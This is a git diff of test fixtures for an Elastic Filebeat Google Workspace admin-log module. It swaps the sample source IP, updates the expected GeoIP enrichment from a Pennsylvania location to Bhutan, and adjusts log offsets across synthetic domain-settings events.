+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPLOAD_OAUTH_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REGENERATE_OAUTH_CONSUMER_SECRET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OPEN_ID_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ORGANIZATION_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OUTBOUND_RELAY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MAX_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MIN_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RENEW_DOMAIN_REGISTRATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RESELLER_ACCESS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RULE_ACTIONS_CHANGED","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RULE_CRITERIA","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_RULE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RULE_STATUS_CHANGED","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_SECONDARY_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_SSO_SETTINGS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_PIN"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json
index 555f9bec5b0d..8345b2726e31 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json
@@ -8,7 +8,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ACCOUNT_AUTO_RENEWAL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"NON_AUTO_RENEWAL\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ACCOUNT_AUTO_RENEWAL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"NON_AUTO_RENEWAL\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -24,23 +24,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -61,7 +57,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_ENABLED\",\"value\":\"app enabled\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_ENABLED\",\"value\":\"app enabled\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -75,26 +71,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 437,
+ "log.offset": 436,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -115,7 +107,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -128,26 +120,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 900,
+ "log.offset": 898,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -168,7 +156,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ADVERTISEMENT_OPTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ADVERTISEMENT_OPTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -182,26 +170,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1323,
+ "log.offset": 1320,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -222,7 +206,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "creation"
@@ -234,26 +218,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1782,
+ "log.offset": 1778,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -274,7 +254,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ALERT_CRITERIA\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ALERT_CRITERIA\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -286,26 +266,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2154,
+ "log.offset": 2149,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -326,7 +302,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "deletion"
@@ -338,26 +314,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2535,
+ "log.offset": 2529,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
